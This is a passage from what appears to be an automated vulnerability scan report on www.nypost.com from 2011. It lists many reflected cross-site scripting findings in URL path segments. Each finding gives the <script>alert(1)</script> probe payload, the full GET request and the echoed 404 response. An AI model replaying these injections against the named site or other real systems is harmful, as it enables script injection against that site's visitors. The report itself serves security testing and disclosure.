The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d1d78<script>alert(1)</script>c9be5fa64ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.cssd1d78<script>alert(1)</script>c9be5fa64ab HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.cssd1d78<script>alert(1)</script>c9be5fa64ab</p>
...[SNIP]...

1.349. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/misc.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/misc.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c03a1<script>alert(1)</script>c47687d3e5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigc03a1<script>alert(1)</script>c47687d3e5d/WebPortal/nypost/css/misc.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigc03a1<script>alert(1)</script>c47687d3e5d/WebPortal/nypost/css/misc.css</p>
...[SNIP]...

1.350. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/misc.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/misc.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 859f8<script>alert(1)</script>d404ef66d51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal859f8<script>alert(1)</script>d404ef66d51/nypost/css/misc.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal859f8<script>alert(1)</script>d404ef66d51/nypost/css/misc.css</p>
...[SNIP]...

1.351. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/misc.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/misc.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28f83<script>alert(1)</script>6a39e4a7d89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost28f83<script>alert(1)</script>6a39e4a7d89/css/misc.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost28f83<script>alert(1)</script>6a39e4a7d89/css/misc.css</p>
...[SNIP]...

1.352. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/misc.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/misc.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fa5ef<script>alert(1)</script>7912646ce1d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/cssfa5ef<script>alert(1)</script>7912646ce1d/misc.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:03 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/cssfa5ef<script>alert(1)</script>7912646ce1d/misc.css</p>
...[SNIP]...

1.353. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/misc.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/misc.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5508<script>alert(1)</script>61c3a40e97a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css/misc.cssc5508<script>alert(1)</script>61c3a40e97a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css/misc.cssc5508<script>alert(1)</script>61c3a40e97a</p>
...[SNIP]...

1.354. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96692<script>alert(1)</script>d11ded032fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig96692<script>alert(1)</script>d11ded032fd/WebPortal/nypost/css/styles.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:49 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig96692<script>alert(1)</script>d11ded032fd/WebPortal/nypost/css/styles.css</p>
...[SNIP]...

1.355. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f4d1<script>alert(1)</script>2ec7cf7cb7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal5f4d1<script>alert(1)</script>2ec7cf7cb7e/nypost/css/styles.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal5f4d1<script>alert(1)</script>2ec7cf7cb7e/nypost/css/styles.css</p>
...[SNIP]...

1.356. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/styles.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/styles.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8dc9<script>alert(1)</script>b187d57790e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostc8dc9<script>alert(1)</script>b187d57790e/css/styles.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostc8dc9<script>alert(1)</script>b187d57790e/css/styles.css</p>
...[SNIP]...

1.357. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/styles.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/styles.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4778<script>alert(1)</script>0dea580f227 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/cssc4778<script>alert(1)</script>0dea580f227/styles.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/cssc4778<script>alert(1)</script>0dea580f227/styles.css</p>
...[SNIP]...

1.358. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/styles.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/styles.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 75522<script>alert(1)</script>c7a9fa5d639 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css/styles.css75522<script>alert(1)</script>c7a9fa5d639 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css/styles.css75522<script>alert(1)</script>c7a9fa5d639</p>
...[SNIP]...

1.359. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fb78<script>alert(1)</script>fb8cae1f720 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig8fb78<script>alert(1)</script>fb8cae1f720/WebPortal/nypost/scripts/facebox/facebox.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig8fb78<script>alert(1)</script>fb8cae1f720/WebPortal/nypost/scripts/facebox/facebox.css</p>
...[SNIP]...

1.360. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d74e4<script>alert(1)</script>8df28f761c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortald74e4<script>alert(1)</script>8df28f761c8/nypost/scripts/facebox/facebox.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortald74e4<script>alert(1)</script>8df28f761c8/nypost/scripts/facebox/facebox.css</p>
...[SNIP]...

1.361. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22ce5<script>alert(1)</script>4895d346a45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost22ce5<script>alert(1)</script>4895d346a45/scripts/facebox/facebox.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost22ce5<script>alert(1)</script>4895d346a45/scripts/facebox/facebox.css</p>
...[SNIP]...

1.362. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2d472<script>alert(1)</script>5e9a8efe6c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/scripts2d472<script>alert(1)</script>5e9a8efe6c3/facebox/facebox.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/scripts2d472<script>alert(1)</script>5e9a8efe6c3/facebox/facebox.css</p>
...[SNIP]...

1.363. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f4463<script>alert(1)</script>c504fe1daa5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/scripts/faceboxf4463<script>alert(1)</script>c504fe1daa5/facebox.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/scripts/faceboxf4463<script>alert(1)</script>c504fe1daa5/facebox.css</p>
...[SNIP]...

1.364. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d9ac4<script>alert(1)</script>6329a42c9a8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.cssd9ac4<script>alert(1)</script>6329a42c9a8 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/scripts/facebox/facebox.cssd9ac4<script>alert(1)</script>6329a42c9a8</p>
...[SNIP]...

1.365. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6abf0<script>alert(1)</script>9833a54d3c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig6abf0<script>alert(1)</script>9833a54d3c9/WebPortal/nypost/blocks/_news/local/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig6abf0<script>alert(1)</script>9833a54d3c9/WebPortal/nypost/blocks/_news/local/events/events.css</p>
...[SNIP]...

1.366. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6264a<script>alert(1)</script>696e2bc1cc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal6264a<script>alert(1)</script>696e2bc1cc2/nypost/blocks/_news/local/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

